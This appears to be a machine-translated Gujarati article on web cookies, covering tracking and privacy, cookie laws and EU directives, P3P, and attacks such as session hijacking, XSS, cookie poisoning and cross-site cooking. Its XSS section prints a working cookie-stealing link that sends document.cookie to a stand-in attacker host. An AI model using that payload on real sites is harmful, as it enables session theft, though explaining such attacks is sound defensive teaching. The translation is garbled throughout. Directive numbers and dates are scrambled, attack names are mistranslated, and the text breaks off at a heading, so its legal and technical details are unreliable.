કૂકીઝ વપરાશકર્તાના કમ્પ્યુટરમાંથી માહિતીને ભૂંસી અથવા વાંચી શકતી નથી. જો કે, કૂકીઝ આપેલ સાઇટ અથવા સાઇટના સેટ પર વપરાશકર્તા દ્વારા મુલાકાત લીધેલ વેબ પૃષ્ઠોને શોધવાનું શક્ય બનાવે છે. આ માહિતી વપરાશકર્તા પ્રોફાઇલમાં એકત્રિત કરી શકાય છે જેનો ઉપયોગ અથવા તૃતીય પક્ષોને ફરીથી વેચી શકાય છે, જે ગંભીર ગોપનીયતા સમસ્યાઓ ઊભી કરી શકે છે. કેટલીક પ્રોફાઇલ્સ અનામી હોય છે, તે અર્થમાં કે તેમાં કોઈ વ્યક્તિગત માહિતી નથી, તેમ છતાં આવી પ્રોફાઇલ્સ પણ શંકાસ્પદ હોઈ શકે છે.

સમાન અભ્યાસ મુજબ, ઇન્ટરનેટ વપરાશકર્તાઓની મોટી ટકાવારી કૂકીઝને કેવી રીતે કાઢી નાખવી તે જાણતા નથી. લોકો કૂકીઝ પર વિશ્વાસ કરતા નથી તેનું એક કારણ એ છે કે કેટલીક સાઇટ્સે કૂકીઝના વ્યક્તિગત રીતે ઓળખી શકાય તેવા પાસાઓનો દુરુપયોગ કર્યો છે અને આ માહિતી અન્ય સ્ત્રોતો સાથે શેર કરી છે. ટાર્ગેટેડ જાહેરાતો અને વણજોઈતા ઈમેલની મોટી ટકાવારી, જેને સ્પામ ગણવામાં આવે છે, તે ટ્રેકિંગ કૂકીઝમાંથી મેળવેલી માહિતીમાંથી આવે છે.

બ્રાઉઝર સેટિંગ્સ

મોટાભાગના બ્રાઉઝર્સ કૂકીઝને સપોર્ટ કરે છે અને વપરાશકર્તાને તેને અક્ષમ કરવાની મંજૂરી આપે છે. સૌથી સામાન્ય વિકલ્પો છે:

  • કૂકીઝને સંપૂર્ણપણે સક્ષમ અથવા અક્ષમ કરો, જેથી તે સતત સ્વીકારવામાં આવે અથવા અવરોધિત કરવામાં આવે.
  • બ્રાઉઝરના એડ્રેસ બારમાં javascript: alert(document.cookie) દાખલ કરીને વપરાશકર્તાને આપેલ પૃષ્ઠમાં સક્રિય કૂકીઝ જોવાની મંજૂરી આપો. કેટલાક બ્રાઉઝર્સ વપરાશકર્તા માટે કૂકી મેનેજરનો સમાવેશ કરે છે જે હાલમાં બ્રાઉઝર દ્વારા સંગ્રહિત કૂકીઝને જોઈ અને પસંદ કરી શકે છે.

મોટાભાગના બ્રાઉઝર વ્યક્તિગત ડેટાને સંપૂર્ણ કાઢી નાખવાની મંજૂરી આપે છે જેમાં કૂકીઝનો સમાવેશ થાય છે. કૂકી પરવાનગીઓને નિયંત્રિત કરવા માટે વધારાના મોડ્યુલ્સ પણ અસ્તિત્વમાં છે.

ગોપનીયતા અને તૃતીય-પક્ષ કૂકીઝ

આ કાલ્પનિક ઉદાહરણમાં, એક જાહેરાત કંપનીએ બે વેબસાઇટ્સ પર બેનરો મૂક્યા છે. તેના સર્વર પર બેનરો હોસ્ટ કરીને અને તૃતીય પક્ષ કૂકીઝનો ઉપયોગ કરીને, જાહેરાત કંપની આ બે સાઇટ્સ દ્વારા વપરાશકર્તાના નેવિગેશનને ટ્રૅક કરવામાં સક્ષમ છે.

કૂકીઝ વેબ વપરાશકર્તાઓની ગોપનીયતા અને અનામી માટે મહત્વપૂર્ણ અસરો ધરાવે છે. જો કે કૂકીઝ માત્ર તેમને સેટ કરેલા સર્વર પર અથવા તે જ ઈન્ટરનેટ ડોમેન સાથે જોડાયેલા સર્વર પર પાછા મોકલવામાં આવે છે, તેમ છતાં વેબ પેજમાં અન્ય ડોમેન્સથી સંબંધિત સર્વર્સ પર સંગ્રહિત છબીઓ અથવા અન્ય ઘટકો હોઈ શકે છે. આ બાહ્ય ઘટકોની પુનઃપ્રાપ્તિ દરમિયાન સેટ કરેલી કૂકીઝ કહેવામાં આવે છે તૃતીય પક્ષ કૂકીઝ. આમાં અનિચ્છનીય પોપ-અપ વિન્ડોમાંથી કૂકીઝનો સમાવેશ થાય છે.

જાહેરાત કંપનીઓ તૃતીય પક્ષ કૂકીઝનો ઉપયોગ વપરાશકર્તાઓને તેઓ મુલાકાત લેતી વિવિધ સાઇટ પર ટ્રેક કરવા માટે કરે છે. ખાસ કરીને, એક એડવર્ટાઈઝીંગ કંપની યુઝરને તમામ પેજ પર ટ્રેક કરી શકે છે જ્યાં તેણે એડવર્ટાઈઝીંગ ઈમેજીસ અથવા ટ્રેકીંગ પિક્સેલ મુક્યા છે. વપરાશકર્તા દ્વારા મુલાકાત લીધેલ પૃષ્ઠોનું જ્ઞાન જાહેરાત કંપનીને વપરાશકર્તાની જાહેરાત પસંદગીઓને લક્ષ્ય બનાવવાની મંજૂરી આપે છે.

કેટલાક લોકો દ્વારા વપરાશકર્તા પ્રોફાઇલ બનાવવાની ક્ષમતાને ગોપનીયતા આક્રમણ તરીકે ગણવામાં આવે છે, ખાસ કરીને જ્યારે તૃતીય પક્ષ કૂકીઝનો ઉપયોગ કરીને વિવિધ ડોમેન્સ પર ટ્રેકિંગ કરવામાં આવે છે. આ કારણોસર, કેટલાક દેશોમાં કૂકી કાયદો છે.

યુનાઇટેડ સ્ટેટ્સ સરકારે 2000 માં કૂકીઝના પ્લેસમેન્ટ પર કડક નિયમો અમલમાં મૂક્યા હતા, જ્યારે તે બહાર આવ્યું હતું કે વ્હાઇટ હાઉસ ડ્રગ પોલિસી ઓફિસ ઓનલાઈન દવાની જાહેરાતો જોનારા વપરાશકર્તાઓના કમ્પ્યુટર્સ પર નજર રાખવા માટે કૂકીઝનો ઉપયોગ કરી રહી છે. 2002 માં, ગોપનીયતા કાર્યકર્તા ડેનિયલ બ્રાંડટે શોધ્યું હતું કે CIA એ કમ્પ્યુટર્સ પર સતત કૂકીઝ છોડી દીધી હતી જેણે તેની વેબસાઇટ્સની મુલાકાત લીધી હતી. એકવાર આ ભંગની જાણ થતાં, CIA એ જાહેર કર્યું કે આ કૂકીઝ ઈરાદાપૂર્વક મોકલવામાં આવી નથી અને તેને સેટ કરવાનું બંધ કરી દીધું. 25 ડિસેમ્બર, 2005ના રોજ, બ્રાંડટે શોધ્યું કે નેશનલ સિક્યુરિટી એજન્સી (NSA) એ સોફ્ટવેર અપડેટને કારણે મુલાકાતીઓના કમ્પ્યુટર્સ પર બે સતત કૂકીઝ છોડી દીધી હતી. સૂચના મળ્યા પછી, NSA એ તરત જ કૂકીઝને અક્ષમ કરી દીધી.

યુનાઇટેડ કિંગડમમાં, ધ કૂકી કાયદો “, 25 મે, 2012 ના રોજ અમલમાં આવ્યું, સાઇટ્સને તેમના ઇરાદા જાહેર કરવા માટે બંધાયેલા છે, આમ વપરાશકર્તાઓને તે પસંદ કરવાની મંજૂરી આપે છે કે તેઓ ઇન્ટરનેટ પર તેમના માર્ગના નિશાન છોડવા માગે છે કે નહીં. આમ તેઓને જાહેરાતના લક્ષ્યાંકથી સુરક્ષિત કરી શકાય છે. જો કે, અનુસાર ધ ગાર્ડિયન, ઇન્ટરનેટ વપરાશકર્તાઓની સંમતિ સ્પષ્ટપણે જરૂરી નથી; વપરાશકર્તાની સંમતિની શરતોમાં ફેરફાર કરવામાં આવ્યા છે આમ ગર્ભિત.

ગોપનીયતા પર નિર્દેશક 2002/58

નિર્દેશક 202/58 ગોપનીયતા અને ઇલેક્ટ્રોનિક સંચાર, કૂકીઝના ઉપયોગ પરના નિયમો ધરાવે છે. ખાસ કરીને, લેખ 5, આ નિર્દેશના ફકરા 3 માટે જરૂરી છે કે વપરાશકર્તાના કમ્પ્યુટરમાં ડેટા (જેમ કે કૂકીઝ)નો સંગ્રહ ફક્ત ત્યારે જ થઈ શકે જો:

  • ડેટાનો ઉપયોગ કેવી રીતે થાય છે તેની માહિતી વપરાશકર્તાને આપવામાં આવે છે;
  • વપરાશકર્તાને આ સ્ટોરેજ ઓપરેશનનો ઇનકાર કરવાનો વિકલ્પ આપવામાં આવે છે. જો કે, આ લેખ એ પણ જણાવે છે કે તકનીકી કારણોસર ડેટાના સંગ્રહને આ કાયદામાંથી મુક્તિ આપવામાં આવી છે.

ઑક્ટોબર 2003 થી અમલમાં આવવાના કારણે, ડિસેમ્બર 2004 ના અહેવાલ અનુસાર આ નિર્દેશને માત્ર ખૂબ જ અપૂર્ણપણે અમલમાં મૂકવામાં આવ્યો હતો, જેમાં એ પણ નિર્દેશ કર્યો હતો કે અમુક સભ્ય રાજ્યો (સ્લોવાકિયા, લાતવિયા, ગ્રીસ, બેલ્જિયમ અને લક્ઝમબર્ગ) એ હજુ સુધી આ નિયમોનું સ્થાનાંતરણ કર્યું નથી. ઘરેલું કાયદામાં નિર્દેશ.

29 માં G2010 ના અભિપ્રાય મુજબ, ઇન્ટરનેટ વપરાશકર્તાની સ્પષ્ટ સંમતિ પર, વર્તણૂકલક્ષી જાહેરાત હેતુઓ માટે કૂકીઝના ઉપયોગને ખાસ કરીને શરતો આપતો આ નિર્દેશ ખૂબ જ ખરાબ રીતે લાગુ પડે છે. વાસ્તવમાં, મોટાભાગની સાઇટ્સ "ટેકનિકલ" કૂકીઝ વચ્ચે તફાવત કર્યા વિના, ઉપયોગો વિશેની માહિતી આપ્યા વિના, "કૂકીઝ" ના ઉપયોગની માહિતી આપતા એક સરળ "બેનર" સુધી પોતાને મર્યાદિત કરીને નિર્દેશનું પાલન કરતી નથી તે રીતે આવું કરે છે. "ટ્રેકિંગ" કૂકીઝ, તેમજ ટેક્નિકલ કૂકીઝ (જેમ કે શોપિંગ કાર્ટ મેનેજમેન્ટ કૂકીઝ) જાળવવા અને "ટ્રેકિંગ" કૂકીઝને નકારવા માંગતા વપરાશકર્તાને વાસ્તવિક પસંદગીની ઑફર કરવી નહીં. હકીકતમાં, જો કૂકીઝ નકારવામાં આવે તો ઘણી સાઇટ્સ યોગ્ય રીતે કાર્ય કરતી નથી, જે ડાયરેક્ટિવ 2002/58 અથવા ડાયરેક્ટિવ 95/46 (વ્યક્તિગત ડેટાનું રક્ષણ) નું પાલન કરતી નથી.

નિર્દેશક 2009/136/CE

આ સામગ્રીને 2009 નવેમ્બર, 136 ના ડાયરેક્ટિવ 25/2009/EC દ્વારા અપડેટ કરવામાં આવી છે જે જણાવે છે કે "માહિતીનો સંગ્રહ, અથવા ગ્રાહક અથવા વપરાશકર્તાના ટર્મિનલ સાધનોમાં પહેલાથી જ સંગ્રહિત માહિતીની ઍક્સેસ મેળવવાની માત્ર શરતે પરવાનગી છે કે સબ્સ્ક્રાઇબર અથવા વપરાશકર્તાએ ડાયરેક્ટિવ 95/46/ECના પાલનમાં, પ્રક્રિયાના હેતુઓ પર અન્ય લોકો વચ્ચે સ્પષ્ટ અને સંપૂર્ણ માહિતી પ્રાપ્ત કર્યા પછી, તેમની સંમતિ આપી છે. તેથી નવો નિર્દેશ ઇન્ટરનેટ વપરાશકર્તાના કમ્પ્યુટર પર કૂકીઝ મૂકતા પહેલાની જવાબદારીઓને મજબૂત બનાવે છે.

નિર્દેશની પ્રારંભિક વિચારણાઓમાં, યુરોપિયન ધારાસભ્ય સ્પષ્ટ કરે છે: "જ્યાં તકનીકી રીતે શક્ય અને અસરકારક હોય, નિર્દેશક 95/46/EC ની સંબંધિત જોગવાઈઓ અનુસાર, પ્રક્રિયાના સંદર્ભમાં વપરાશકર્તાની સંમતિ તેના દ્વારા વ્યક્ત કરી શકાય છે. બ્રાઉઝર અથવા અન્ય એપ્લિકેશનની યોગ્ય સેટિંગ્સનો ઉપયોગ. પરંતુ હકીકતમાં, આજની તારીખે કોઈપણ બ્રાઉઝર આવશ્યક તકનીકી કૂકીઝને વૈકલ્પિકમાંથી અલગ કરવાનું શક્ય બનાવતું નથી જે વપરાશકર્તાની પસંદગી પર છોડી દેવી જોઈએ.

આ નવો નિર્દેશ બેલ્જિયમના સાંસદો દ્વારા જુલાઈ 2012માં અમલમાં મૂકવામાં આવ્યો હતો. 2014નો અભ્યાસ દર્શાવે છે કે સાંસદો પણ અરજી કરવા માટે સંઘર્ષ કરે છે નિર્દેશની મર્યાદાઓ.

P3P

P3P સ્પષ્ટીકરણમાં સર્વર માટે ગોપનીયતા નીતિ જણાવવાની ક્ષમતાનો સમાવેશ થાય છે, જે તે કયા પ્રકારની માહિતી એકત્રિત કરે છે અને કયા હેતુ માટે કરે છે તે વ્યાખ્યાયિત કરે છે. આ નીતિઓમાં કૂકીઝનો ઉપયોગ કરીને એકત્રિત કરવામાં આવેલી માહિતીનો ઉપયોગ શામેલ છે (પરંતુ તેના સુધી મર્યાદિત નથી). P3P ની વ્યાખ્યાઓ અનુસાર, બ્રાઉઝર ગોપનીયતા નીતિઓની વપરાશકર્તાની પસંદગીઓ સાથે સરખામણી કરીને અથવા સર્વર દ્વારા જાહેર કરાયેલ ગોપનીયતા નીતિ ગોપનીયતા નિવેદનને પ્રસ્તુત કરીને વપરાશકર્તાને પૂછીને કૂકીઝને સ્વીકારી અથવા નકારી શકે છે.

Apple Safari અને Microsoft Internet Explorer સંસ્કરણ 6 અને 7 સહિત ઘણા બ્રાઉઝર, P3P ને સપોર્ટ કરે છે જે બ્રાઉઝરને તૃતીય પક્ષ કૂકી સ્ટોરેજ સ્વીકારવા કે નહીં તે નિર્ધારિત કરવાની મંજૂરી આપે છે. ઓપેરા બ્રાઉઝર વપરાશકર્તાઓને તૃતીય-પક્ષ કૂકીઝનો ઇનકાર કરવાની અને ઇન્ટરનેટ ડોમેન્સ માટે વૈશ્વિક અને ચોક્કસ સુરક્ષા પ્રોફાઇલ બનાવવાની મંજૂરી આપે છે. મોઝિલા ફાયરફોક્સ વર્ઝન 2 એ P3P સપોર્ટ છોડી દીધો પરંતુ તેને વર્ઝન 3 માં પુનઃસ્થાપિત કર્યો.

તૃતીય-પક્ષ કૂકીઝને મોટાભાગના બ્રાઉઝર્સ દ્વારા વપરાશકર્તાના વેબ અનુભવને નકારાત્મક અસર કર્યા વિના, ગોપનીયતા વધારવા અને જાહેરાત ટ્રેકિંગ ઘટાડવા માટે અવરોધિત કરી શકાય છે. ઘણી જાહેરાત એજન્સીઓ એક વિકલ્પ આપે છે છોડી દેવું લક્ષિત જાહેરાતો માટે, બ્રાઉઝરમાં એક સામાન્ય કૂકી સેટ કરીને જે આ લક્ષ્યીકરણને નિષ્ક્રિય કરે છે, પરંતુ આવા ઉકેલ વ્યવહારીક રીતે અસરકારક નથી, જ્યારે તેનો આદર કરવામાં આવે છે, કારણ કે વપરાશકર્તા આ કૂકીઝને કાઢી નાખે છે કે તરત જ આ સામાન્ય કૂકી ભૂંસી નાખવામાં આવે છે જે પસંદગીને રદ કરે છે. બહાર નિર્ણય.

કૂકીઝના ગેરફાયદા

ગોપનીયતા સમસ્યાઓ ઉપરાંત, કૂકીઝમાં કેટલીક તકનીકી ખામીઓ પણ છે. ખાસ કરીને, તેઓ હંમેશા વપરાશકર્તાઓને ચોક્કસ રીતે ઓળખી શકતા નથી, તેઓ જ્યારે મોટી સંખ્યામાં હોય ત્યારે તેઓ સાઇટની કામગીરીને ધીમું કરી શકે છે, જ્યારે તેનો ઉપયોગ સુરક્ષા હુમલાઓ માટે થઈ શકે છે, અને તેઓ પ્રતિનિધિ રાજ્ય સ્થાનાંતરણ, સૉફ્ટવેરની આર્કિટેક્ચરલ શૈલી સાથે સંઘર્ષ કરે છે.

અચોક્કસ ઓળખ

જો કમ્પ્યુટર પર એક કરતાં વધુ બ્રાઉઝરનો ઉપયોગ કરવામાં આવે છે, તો તેમાંના દરેકમાં કૂકીઝ માટે હંમેશા અલગ સ્ટોરેજ યુનિટ હોય છે. તેથી કૂકીઝ કોઈ વ્યક્તિને ઓળખતી નથી, પરંતુ વપરાશકર્તા ખાતા, કમ્પ્યુટર અને વેબ બ્રાઉઝરનું સંયોજન. આમ, કોઈપણ વ્યક્તિ આ એકાઉન્ટ્સ, કોમ્પ્યુટર અથવા બ્રાઉઝરનો ઉપયોગ કરી શકે છે જેમાં કૂકીઝનો સમાવેશ થાય છે. એ જ રીતે, કૂકીઝ એક જ યુઝર એકાઉન્ટ, કોમ્પ્યુટર અને બ્રાઉઝર શેર કરતા બહુવિધ વપરાશકર્તાઓ વચ્ચે ભેદ પાડતી નથી, જેમ કે "ઇન્ટરનેટ કાફે" અથવા કમ્પ્યુટર સંસાધનોની મફત ઍક્સેસ આપતી કોઈપણ જગ્યાએ.

પરંતુ વ્યવહારમાં આ નિવેદન મોટા ભાગના કિસ્સાઓમાં ભ્રામક હોવાનું બહાર આવ્યું છે કારણ કે આજે "વ્યક્તિગત" કમ્પ્યુટર (અથવા સ્માર્ટફોન અથવા ટેબ્લેટ, જે વધુ ખરાબ છે)નો ઉપયોગ મુખ્યત્વે એક વ્યક્તિ દ્વારા કરવામાં આવે છે. આ ચોક્કસ વ્યક્તિને લક્ષ્ય બનાવવા સમાન છે અને એકત્રિત માહિતીના જથ્થા દ્વારા વ્યક્તિગત લક્ષ્યાંક પર પહોંચે છે, પછી ભલે તે વ્યક્તિ "નામ" તરીકે ઓળખાયેલ ન હોય.

નેટવર્ક પર અન્ય કમ્પ્યુટર દ્વારા કૂકીની ચોરી થઈ શકે છે.

સામાન્ય કામગીરી દરમિયાન, સર્વર (અથવા સમાન ડોમેનમાં સર્વર્સના જૂથ) અને વપરાશકર્તાના કમ્પ્યુટર બ્રાઉઝર વચ્ચે કૂકીઝ પાછા મોકલવામાં આવે છે. કૂકીઝમાં સંવેદનશીલ માહિતી (વપરાશકર્તા નામ, પ્રમાણીકરણ માટે વપરાતો પાસવર્ડ, વગેરે) હોઈ શકે છે, તેથી તેમની કિંમતો અન્ય કમ્પ્યુટર્સ માટે ઍક્સેસિબલ હોવી જોઈએ નહીં. કૂકી ચોરી એ અનધિકૃત તૃતીય પક્ષ દ્વારા કૂકીઝને અટકાવવાનું કાર્ય છે.

સેશન હાઇજેકિંગ નામના હુમલામાં પેકેટ સ્નિફર દ્વારા કૂકીઝની ચોરી કરી શકાય છે. નેટ પરના ટ્રાફિકને મોકલવા અને પ્રાપ્ત કરનારાઓ સિવાયના કમ્પ્યુટર્સ દ્વારા અટકાવી શકાય છે અને વાંચી શકાય છે (ખાસ કરીને એનક્રિપ્ટેડ જાહેર Wi-Fi જગ્યા પર). આ ટ્રાફિકમાં સાદા HTTP પ્રોટોકોલનો ઉપયોગ કરીને સત્રો પર મોકલવામાં આવેલી કૂકીઝનો સમાવેશ થાય છે. જ્યારે નેટવર્ક ટ્રાફિક એન્ક્રિપ્ટેડ નથી, ત્યારે દૂષિત વપરાશકર્તાઓ આમ "પેકેટ સ્નિફર્સ" નો ઉપયોગ કરીને નેટવર્ક પરના અન્ય વપરાશકર્તાઓના સંચાર વાંચી શકે છે.

HTTPS પ્રોટોકોલનો ઉપયોગ કરીને વપરાશકર્તાના કમ્પ્યુટર અને સર્વર વચ્ચેના જોડાણને એન્ક્રિપ્ટ કરીને આ સમસ્યાને દૂર કરી શકાય છે. સર્વર એ સ્પષ્ટ કરી શકે છે સુરક્ષિત ધ્વજ કૂકી સેટ કરતી વખતે; બ્રાઉઝર તેને માત્ર સુરક્ષિત લાઇન પર મોકલશે, જેમ કે SSL કનેક્શન.

જો કે ઘણી સાઇટ્સ, વપરાશકર્તા પ્રમાણીકરણ (એટલે ​​કે લોગિન પેજ) માટે HTTPS એન્ક્રિપ્ટેડ સંચારનો ઉપયોગ કરતી હોવા છતાં, કાર્યક્ષમતા કારણોસર, બિન-એન્ક્રિપ્ટેડ HTTP કનેક્શન દ્વારા, પછીથી સત્ર કૂકીઝ અને અન્ય ડેટાને સામાન્ય તરીકે મોકલે છે. હુમલાખોરો આમ અન્ય વપરાશકર્તાઓની કૂકીઝને અટકાવી શકે છે અને યોગ્ય સાઇટ્સ પર તેમનો ઢોંગ કરી શકે છે અથવા કૂકી હુમલાઓમાં તેનો ઉપયોગ કરી શકે છે.

સાઇટમાં સ્ક્રિપ્ટીંગ: એક કૂકી કે જે ફક્ત સર્વર અને ક્લાયન્ટ વચ્ચે જ આપલે થવી જોઈએ તે અન્ય તૃતીય પક્ષને મોકલવામાં આવે છે.

કૂકીઝ ચોરવાની બીજી રીત છે સ્ક્રિપ્ટ સાઇટ્સ અને બ્રાઉઝર પોતે દૂષિત સર્વર્સ પર કૂકીઝ મોકલે છે જે તેમને ક્યારેય પ્રાપ્ત કરતું નથી. આધુનિક બ્રાઉઝર્સ સર્વરમાંથી કોડના માંગેલા ભાગોને અમલમાં મૂકવાની મંજૂરી આપે છે. જો રનટાઈમ દરમિયાન કૂકીઝ એક્સેસ કરવામાં આવે છે, તો તેમના મૂલ્યોને અમુક સ્વરૂપે સર્વર્સને સંચાર કરવામાં આવી શકે છે જે તેમને ઍક્સેસ ન કરવા જોઈએ. નેટવર્ક પર મોકલવામાં આવે તે પહેલાં કૂકીઝને એન્ક્રિપ્ટ કરવાથી હુમલાને નિષ્ફળ કરવામાં મદદ મળતી નથી.

આ પ્રકારની ઇન-સાઇટ સ્ક્રિપ્ટીંગનો ઉપયોગ સામાન્ય રીતે એવી સાઇટ્સ પર હુમલાખોરો દ્વારા કરવામાં આવે છે જે વપરાશકર્તાઓને HTML સામગ્રી પોસ્ટ કરવાની મંજૂરી આપે છે. HTML યોગદાનમાં સુસંગત કોડના ભાગને એકીકૃત કરીને, હુમલાખોર અન્ય વપરાશકર્તાઓ પાસેથી કૂકીઝ પ્રાપ્ત કરી શકે છે. આ કૂકીઝના જ્ઞાનનો ઉપયોગ ચોરેલી કૂકીઝનો ઉપયોગ કરીને સમાન સાઇટ સાથે કનેક્ટ કરીને કરી શકાય છે, આમ તે વપરાશકર્તા તરીકે ઓળખાય છે જેની કૂકીઝ ચોરાઈ હતી.

આવા હુમલાઓને રોકવાની એક રીત છે HttpOnly ફ્લેગનો ઉપયોગ કરવો; તે એક વિકલ્પ છે, જે PHP માં ઈન્ટરનેટ એક્સપ્લોરરના સંસ્કરણ 6 થી આવૃત્તિ 5.2.0 થી રજૂ કરવામાં આવ્યો છે જે સ્ક્રિપ્ટની નજીકના ક્લાયંટ માટે કૂકીને અગમ્ય બનાવવાનું આયોજન છે. જો કે, વેબ ડેવલપર્સે તેમના સાઈટ ડેવલપમેન્ટમાં આને ધ્યાનમાં લેવું જોઈએ જેથી તેઓ સાઈટમાં સ્ક્રિપ્ટીંગ માટે પ્રતિરક્ષા રાખે.

ઉપયોગમાં લેવાતા અન્ય સુરક્ષા ખતરા એ સાઇટમાં ડિમાન્ડ ફેબ્રિકેશન છે.

અધિકૃત તકનીકી સ્પષ્ટીકરણ કૂકીઝને ફક્ત તે ડોમેનમાંના સર્વર્સને જ પાછા મોકલવાની મંજૂરી આપે છે જ્યાંથી તેઓ ઉદ્ભવ્યા છે. જો કે, કૂકી હેડર સિવાયના અન્ય માધ્યમોનો ઉપયોગ કરીને કૂકીઝનું મૂલ્ય અન્ય સર્વર્સને મોકલી શકાય છે.

ખાસ કરીને, JavaScript જેવી સ્ક્રિપ્ટીંગ ભાષાઓને સામાન્ય રીતે કૂકી મૂલ્યોને ઍક્સેસ કરવાની મંજૂરી આપવામાં આવે છે અને તે ઇન્ટરનેટ પર કોઈપણ સર્વરને મનસ્વી મૂલ્યો મોકલવામાં સક્ષમ છે. આ સ્ક્રિપ્ટીંગ ક્ષમતાનો ઉપયોગ વેબસાઇટ્સ પરથી થાય છે જે વપરાશકર્તાઓને અન્ય વપરાશકર્તાઓને જોવા માટે HTML સામગ્રી પોસ્ટ કરવાની મંજૂરી આપે છે.

ઉદાહરણ તરીકે, example.com ડોમેન પર ઓપરેટ કરી રહેલા હુમલાખોર લોકપ્રિય બ્લોગ તરફ નિર્દેશ કરતી નીચેની લિંક ધરાવતી ટિપ્પણી પોસ્ટ કરી શકે છે જેને તેઓ અન્યથા નિયંત્રિત કરતા નથી:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

જ્યારે અન્ય વપરાશકર્તા આ લિંક પર ક્લિક કરે છે, ત્યારે બ્રાઉઝર કોડના onclick એટ્રિબ્યુટ ભાગને એક્ઝિક્યુટ કરે છે, તેથી તે document.cookie સ્ટ્રિંગને વપરાશકર્તા કૂકીઝની સૂચિ સાથે બદલે છે જે આ પૃષ્ઠ માટે સક્રિય છે. તેથી, કૂકીઝની આ સૂચિ example.com સર્વર પર મોકલવામાં આવે છે, અને તેથી હુમલાખોર આ વપરાશકર્તાની કૂકીઝ એકત્રિત કરવામાં સક્ષમ છે.

આ પ્રકારના હુમલાને વપરાશકર્તાની બાજુએ શોધવું મુશ્કેલ છે કારણ કે સ્ક્રિપ્ટ એ જ ડોમેનમાંથી આવે છે જે કૂકી સેટ કરે છે, અને મૂલ્યો મોકલવાની કામગીરી તે ડોમેન દ્વારા અધિકૃત હોવાનું જણાય છે. એવું માનવામાં આવે છે કે દૂષિત કોડના પ્રકાશનને અટકાવતા પ્રતિબંધો મૂકવાની આ પ્રકારની સાઇટનું સંચાલન કરતા સંચાલકોની જવાબદારી છે.

કૂકીઝ JavaScript જેવા ક્લાયન્ટ-સાઇડ પ્રોગ્રામ્સ પર સીધી રીતે દેખાતી નથી જો તે HttpOnly ફ્લેગ સાથે મોકલવામાં આવી હોય. સર્વરના દૃષ્ટિકોણથી, માત્ર એટલો જ તફાવત છે કે Set-Cookie હેડરની લાઇનમાં HttpOnly સ્ટ્રિંગ ધરાવતી નવી ફીલ્ડ ઉમેરવામાં આવે છે:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

જ્યારે બ્રાઉઝર આવી કૂકી મેળવે છે, ત્યારે તે સામાન્ય રીતે નીચેના HTTP એક્સચેન્જમાં તેનો ઉપયોગ કરે તેવું માનવામાં આવે છે, પરંતુ તેને ક્લાયંટ બાજુ પર એક્ઝિક્યુટ કરવામાં આવેલી સ્ક્રિપ્ટ્સને દૃશ્યમાન બનાવ્યા વિના. HttpOnly ધ્વજ કોઈપણ સત્તાવાર તકનીકી સ્પષ્ટીકરણનો ભાગ નથી, અને તે બધા બ્રાઉઝર્સમાં લાગુ કરવામાં આવતો નથી. નોંધ કરો કે XMLHTTPRrequest પદ્ધતિ દ્વારા સત્ર કૂકીઝના વાંચન અને લેખનને રોકવા માટે હાલમાં કોઈ રીત નથી.

સામગ્રીમાં ફેરફાર: હુમલાખોર સર્વર પર અમાન્ય કૂકી મોકલે છે, સંભવતઃ સર્વર દ્વારા મોકલવામાં આવેલી માન્ય કૂકીમાંથી બનાવવામાં આવે છે.

જલદી કૂકીઝને સંગ્રહિત કરવાની અને સર્વર પર અપરિવર્તિત પરત કરવાની જરૂર છે, હુમલાખોર કૂકીઝને સર્વર પર પાછા મોકલવામાં આવે તે પહેલાં તેના મૂલ્યમાં ફેરફાર કરી શકે છે. ઉદાહરણ તરીકે, જો કૂકીમાં સ્ટોરના શોપિંગ કાર્ટમાં મૂકવામાં આવેલી આઇટમ્સ માટે વપરાશકર્તાને ચૂકવવાની કુલ કિંમત હોય, તો આ મૂલ્ય બદલવાથી સર્વર હુમલાખોરને પ્રારંભિક કિંમત કરતાં ઓછું ચાર્જ કરવાના જોખમમાં મૂકે છે. કૂકીઝના મૂલ્યમાં ફેરફાર કરવાની પ્રક્રિયા કહેવામાં આવે છે કૂકી ઝેર અને હુમલાને સતત બનાવવા માટે કૂકીની ચોરી પછી તેનો ઉપયોગ કરી શકાય છે.

કૂકી ઓવરરાઇડ પદ્ધતિમાં, હુમલાખોર સર્વર પર અમાન્ય કૂકી મોકલવા માટે બ્રાઉઝરની ભૂલનો ઉપયોગ કરે છે.

મોટાભાગની વેબસાઇટ્સ, જોકે, માત્ર એક સત્ર ID સંગ્રહિત કરે છે — એક રેન્ડમલી જનરેટ થયેલ અનન્ય નંબર જેનો ઉપયોગ સત્ર વપરાશકર્તાને ઓળખવા માટે થાય છે — કૂકીમાં જ, જ્યારે અન્ય તમામ માહિતી સર્વર પર સંગ્રહિત થાય છે. આ કિસ્સામાં, આ સમસ્યા મોટે ભાગે હલ થાય છે.

દરેક સાઇટની પોતાની કૂકીઝ હોવાની અપેક્ષા છે, તેથી એક સાઇટ બીજી સાઇટ સાથે સંકળાયેલી કૂકીઝને સંશોધિત અથવા બનાવવા માટે સક્ષમ ન હોવી જોઈએ. વેબ બ્રાઉઝર સુરક્ષા ખામી દૂષિત સાઇટ્સને આ નિયમનો ભંગ કરવાની મંજૂરી આપી શકે છે. આવી ખામીના શોષણને સામાન્ય રીતે કહેવામાં આવે છે ક્રોસ-સાઇટ રસોઈ. આવા હુમલાઓનો હેતુ સત્ર ID ચોરી હોઈ શકે છે.

વપરાશકર્તાઓએ વેબ બ્રાઉઝર્સના નવીનતમ સંસ્કરણોનો ઉપયોગ કરવો જોઈએ જેમાં આ નબળાઈઓને વર્ચ્યુઅલ રીતે દૂર કરવામાં આવે છે.

ક્લાયંટ અને સર્વર વચ્ચે વિરોધાભાસી સ્થિતિ

